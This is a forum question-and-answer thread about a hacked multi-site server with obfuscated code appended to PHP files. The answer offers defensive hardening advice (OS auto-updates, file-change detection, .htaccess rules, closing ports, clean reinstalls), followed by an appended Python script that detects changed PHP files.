My (managed) dedicated server, with several sites (not all of which use WP) has been hacked.
Obfuscated code has been appended to all files (including WP core/plugin/theme and non-WP stuff) for which the content begins with a php command (and not simply all files with a .php suffix).
It doesn’t seem to affect the rendered page, and what little I know suggests it’s a backdoor/trojan – which is about the limit of my knowledge.
Today, I find permissions changed to 200 – which I suspect might have been done by my service provider (although I’ve not received notification, nor yet an answer to my ‘have you…?’ question).
I’m curious about what the code does, although decoding it isn’t worthwhile as it’s clearly in some way ‘bad stuff’.
I want to find the extent of the damage, the cause, and prevent a re-occurrence.
It’s fairly simple (though time consuming) to replace the obviously-changed files, and this I’ll do.
My sql db backups seem to be ‘clean’ – but I don’t know enough to be sure.
I’m perhaps wrongly assuming the cause to be WP-related, but don’t know if it might instead have been through password-guessing or other.
Constructive suggestions appreciated. Please and thanks.
Update: having been asked about the extra code, it’s added below. I didn’t originally include it, because it didn’t seem appropriate (not worth the effort of decoding, without which probably little to be gained).
2 Answers
My (managed) dedicated server, with several sites (not all of which use WP) has been hacked.
OK, it happens. Not the end of the world.
Today, I find permissions changed to 200 – which I suspect might have been done by my service provider (although I’ve not received notification, nor yet an answer to my ‘have you…?’ question).
It may be that someone tried to attack your service provider. It is quite uncommon to have the 200 user permission.
In Linux there are two methods to change the file.php permissions.
-rwxrwxrwx file.php
- Symbolic method
- Absolute Value method
The symbolic method is for geeks such as David MacKenzie, who wrote the chmod tool, and we will only speak in the absolute value method.
The permission of the following file:
-rwxrwxrwx file.php
is 777.
Apparently your files were 200 like this:
--w------- file.php
4 means Read
2 means Write
1 means Execute
Looks like the hacker got your root access.
I’m curious about what the code does, although decoding it isn’t worthwhile as it’s clearly in some way ‘bad stuff’.
I would not bother with that. I would focus on recovery. Otherwise, you will just lose precious time.
I want to find the extent of the damage, the cause and prevent a re-occurrence.
Correct, I will focus only on prevention.
If your hosting provider doesn’t provide feedback that this was their fault, then this may be your fault.
Have you used the latest version of PHP?
Check out this URL and note that in 2016, 207 security flaws were found in PHP.
http://www.cvedetails.com/product/128/PHP-PHP.html?vendor_id=74
PHP is getting there, but you need to constantly upgrade the version.
Have you used software auto upgrades?
But not only PHP, you need to create automatic updates for the whole web server. This is very important.
Occasionally, there are new vulnerabilities found for the CentOS or Ubuntu you are running. And I have witnessed some great problems just because the OS was not up to date with security updates.
In Ubuntu you would do something like
sudo apt-get update
sudo unattended-upgrade
somewhere in cron job, or
unattended-upgrade --dry-run --debug
to test the upgrade.
If you like to make upgrades to work as a service, you may try
dpkg-reconfigure unattended-upgrades
You would generally need to do that if your hosting company is not doing this automatically. Please check.
Have you used file change detection?
Part of the iThemes security plugin you already use is File change detection. This is very important to have set, since all the security analytics mention this is a key feature. However, from there you will need to pay attention to the files updated. It is important to keep the number of folders low and to set it not to inform you based on the extension of the files. Typically you don’t need to track images.
Did anyone find your log files?
Log files should be prohibited in general via .htaccess. If you are on Nginx, then in the Nginx config file. There are certain backup plugins that use wp-content to store the log files. Some of these do have a weak naming convention, and scouts may get your logs, with the information about your web server.
The extension of log files may not always be .log. It may be log.1 and like. Keep that in mind.
Can WP SCAN detect your passwords and users?
Use WP SCAN tool and check if it can crack your passwords.
You may consider a .htaccess rule to prevent WordPress username enumeration if you don’t have any side effects.
# redirect requests such as /?author=1 (user ID probing) to the home page
RewriteCond %{QUERY_STRING} author=\d
RewriteRule ^ /? [L,R=301]
Are your gates wide open?
You may consider closing your mysql port if this is open.
PORT STATE SERVICE
3306/tcp open mysql
Some services such as mysql should not have open ports, like in the example above. You will need to search the web for a good port scanner.
Also, your login form should have the login limit count, as well as your web server SSH and FTP channels.
Another gate is xmlrpc.php. If you don’t need that you may try to eliminate it, because this would be the place where someone may try to log in.
Have you had a firewall in .htaccess?
The sixth generation of the firewall from Perishable Press does not conflict with your .htaccess file at all. https://perishablepress.com/6g/
It includes empty bots, and bad bots removal. As I checked it should work without interfering with the existing .htaccess rules.
You should test this in low traffic time, or on the development server, and possibly use all the tips from there. Should be easy, just copy and paste.
Have you used RIPS to test your plugins and themes?
This will allow you to scan plugins and themes from your http(s)://domain.com/rips/index.php
You can download it from here and extract it to the same level as WordPress:
Then check this out. Query Monitor plugin is perfect, but for the other one the tool found security problems.
I tested the nextgen-gallery and query-monitor plugins. Look what I found.
There are sometimes false positives this tool may provide you, but in general, you will have the feedback.
So the final advice for you.
You don’t know if your MySQL database is clean. You should probably export all the articles using standard WordPress export and create the new one.
You should install new plugins and a new theme. You may even start with a new clean VPS. On Linode this is just a few clicks.
You should start with a new WordPress installation for sure.
Probably you may even change the hosting if you determine they are not reliable.
The hosting provider may provide you some feedback from your web server logs if this is part of the service, so you can better understand what the problem was.
Anyhow — step by step.
Also, please check my other answer I provided to @Rahul, it may be good for prevention.
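A minimal file-change detector of the kind the answer recommends, added here as an example (not code from the original post or from the iThemes plugin). It hashes every file whose content starts with a PHP open tag, whatever its suffix, which matches how the asker's files were chosen, and reports what changed against a saved baseline; demo() builds a constructed web root in a temp directory to show it.

```python
import hashlib
import os
import tempfile

PHP_OPEN_TAG = b"<?php"

def is_php_source(path):
    """True if the file begins with a PHP open tag (a UTF-8 BOM is skipped)."""
    with open(path, "rb") as fh:
        head = fh.read(8)
    if head.startswith(b"\xef\xbb\xbf"):
        head = head[3:]
    return head.startswith(PHP_OPEN_TAG)

def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def build_baseline(root):
    """Map relative path -> sha256 for every PHP source file under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and is_php_source(full):
                baseline[os.path.relpath(full, root)] = sha256_of(full)
    return baseline

def compare(old, new):
    """Return (added, removed, modified) relative paths, each sorted."""
    added = sorted(p for p in new if p not in old)
    removed = sorted(p for p in old if p not in new)
    modified = sorted(p for p in new if p in old and old[p] != new[p])
    return added, removed, modified

def demo():
    # Constructed web root: a .php file, a .inc starting with BOM + <?php, an image.
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'hi';\n")
    with open(os.path.join(root, "conf.inc"), "wb") as fh:
        fh.write(b"\xef\xbb\xbf<?php $x = 1;\n")
    with open(os.path.join(root, "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG...")
    before = build_baseline(root)
    with open(os.path.join(root, "index.php"), "ab") as fh:
        fh.write(b"<?php /* constructed appended line */ ?>\n")  # simulate tampering
    return sorted(before), compare(before, build_baseline(root))
```

In practice, save the baseline right after a clean install and re-run compare() from cron; only files that truly start with PHP code are tracked, so images and other static content do not generate noise.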